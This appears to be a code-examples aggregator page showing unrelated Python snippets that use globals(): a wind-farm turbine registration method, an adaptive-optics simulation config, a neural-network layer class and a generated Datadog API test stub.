              encoding="utf-8") as f:
        json.dump(category_map, f, indent=4, ensure_ascii=False)


if __name__ == '__main__':
    # Drop into an interactive console over the merged global/local
    # namespace so the results built above can be inspected by hand.
    import code
    shell_namespace = dict(globals(), **locals())
    code.interact(local=shell_namespace)
Пример #57
0
    def addTurbine(
        self,
        uniqueID,
        turbineType="SRT",
        diameter=float("NaN"),
        hubHeigt=float("NaN"),
        x_horizontal=float("NaN"),
        y_vertical=float("NaN")
    ):
        """
        Add a wind turbine to this wind farm and return the created turbine.

        By default a single rotor turbine (SRT) is created. The created
        turbine is also registered in the module's global namespace under
        ``uniqueID``, so it stays reachable both through the returned
        reference and by its unique name (this is a reference, not a deep
        copy).

        :param uniqueID: [*req*] Unique ID of the wind turbine as string
        :param turbineType: [*opt*] Type of turbine as string: 'SRT' or 'MRT'
        :param diameter: [*opt*] Diameter of the turbine as float
        :param hubHeigt: [*opt*] Hub height as a float
        :param x_horizontal: [*opt*] Horizontal coordinate of the turbine as float
        :param y_vertical: [*opt*] Vertical coordinate of the turbine as float
        :return: the created SRT/MRT instance, or ``None`` when the turbine
                 could not be added (duplicate ID, invalid name, name clash
                 with an existing global, or unsupported turbine type).
                 (Bug fix: the original raised UnboundLocalError on the
                 failure paths because ``toUserVariable`` was never assigned.)
        """
        if uniqueID in self.createdSRTs:
            # Reject IDs already used inside this wind farm.
            print("A wind turbine with the same unique ID in wind farm [",
                  str(self.uID), "] already exists. New turbine not added.")
            return None

        if not (isinstance(uniqueID, str) and len(uniqueID.split()) == 1):
            # IDs become global variable names, so they must be single-word strings.
            print("Name should be a string without spaces.")
            return None

        if uniqueID in globals():
            # Do not clobber a variable the user has already assigned.
            print("A wind turbine with the same unique ID globally exists. New turbine not added.")
            return None

        if turbineType == "SRT":
            constructor = SRT
        elif turbineType == "MRT":
            constructor = MRT
        else:
            print("Turbine type not supported")
            return None

        # Build the turbine and expose it under its unique ID as well, so it
        # can be referenced either via the returned value or by name.
        toUserVariable = constructor(
            uniqueID,
            diameter=diameter,
            hubHeigt=hubHeigt,
            x_horizontal=x_horizontal,
            y_vertical=y_vertical
        )
        globals()[uniqueID] = toUserVariable
        if turbineType == "SRT":
            self.__numOfSRT += 1
            self.createdSRTs.append(uniqueID)
        else:
            self.__numOfMRT += 1
            self.createdMRTs.append(uniqueID)
        return toUserVariable
Пример #58
0
import base.readConfig
this=base.readConfig.init(globals())
tstep=1/250.#Simulation timestep in seconds (250Hz).
AOExpTime=0.#40 seconds exposure (use --iterations=xxx to modify)
npup=112#Number of phase points across the pupil
telDiam=4.2 #telescope diameter
telSec=4.2/3.5#Central obscuration
ntel=npup#Telescope diameter in pixels
ngsLam=640.#NGS wavelength
lgsLam=589.#LGS wavelength
sciLam=1650.#Science wavelength
ngsAsterismRadius=90.#arcseconds
nsci=1
nngs=4
ndm=1
import util.tel
#Create a pupil function
pupil=util.tel.Pupil(npup,ntel/2,ntel/2*telSec/telDiam)

#Create the WFS overview
import util.guideStar
#import util.elong
#Create the LGS PSFs (elongated).  There are many ways to do this - this is a simple one.
#lgssig=1e6
#psf=util.elong.make(spotsize=phasesize*4,nsubx=wfs_nsubx,wfs_n=phasesize,lam=lgsLam,telDiam=telDiam,telSec=telSec,beacon_alt=lgsalt,beacon_depth=10000.,launchDist=0.,launchTheta=0.,pup=pupil,photons=lgssig)[0]

sourceList=[]
wfsDict={}
for i in range(nngs-1):#7x7 off-axis NGS
    id="%d"%(i+1)
Пример #59
0
if '__file__' in globals():
    # Running from a file (not e.g. an interactive session): make the
    # package root importable by appending the parent directory to sys.path.
    import os
    import sys
    print('__file__ in globals at layers.py')
    package_root = os.path.join(os.path.dirname(__file__), '..')
    sys.path.append(package_root)


from myPackage.core_complex import Variable, Parameter
import numpy as np
import weakref
import myPackage.functions as F


class Layer:
    """
    Layer class
    -----------
    input, hidden, output layer에 대한 기반클래스

    Args
    ----
    name: Layer's name.
    value: Layer's value is put in name's attritube.
    inputs: This parameter means layer's input data.

    Method
    ------
    __setattr__: Get parameter(name, value) and check a value's type in Parameter instance. Then, set attribute value about name.
    __call__: Make callable function instance with inputs value(get variable argument)(This method use weakref.ref for help to circular reference.).
    forward: It will be necessary method from derived class.
    params: Yield a layer instances value using iterator.
# coding: utf-8

# Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.

import sys
import unittest

import datadog_api_client.v2
from datadog_api_client.v2.model.incident_field_attributes import IncidentFieldAttributes
# NOTE(review): re-registers the imported class under its own name, which the
# import above already binds — presumably the generated client resolves model
# references through globals() by string name; confirm before removing.
globals()['IncidentFieldAttributes'] = IncidentFieldAttributes
from datadog_api_client.v2.model.incident_response_attributes import IncidentResponseAttributes


class TestIncidentResponseAttributes(unittest.TestCase):
    """Unit test stubs for the IncidentResponseAttributes model."""

    def setUp(self):
        # No fixtures are needed for these generated stubs.
        pass

    def tearDown(self):
        # Nothing to clean up after each test.
        pass

    def testIncidentResponseAttributes(self):
        """Test IncidentResponseAttributes"""
        # FIXME: construct object with mandatory attributes with example values
        # model = IncidentResponseAttributes()  # noqa: E501
        pass


if __name__ == '__main__':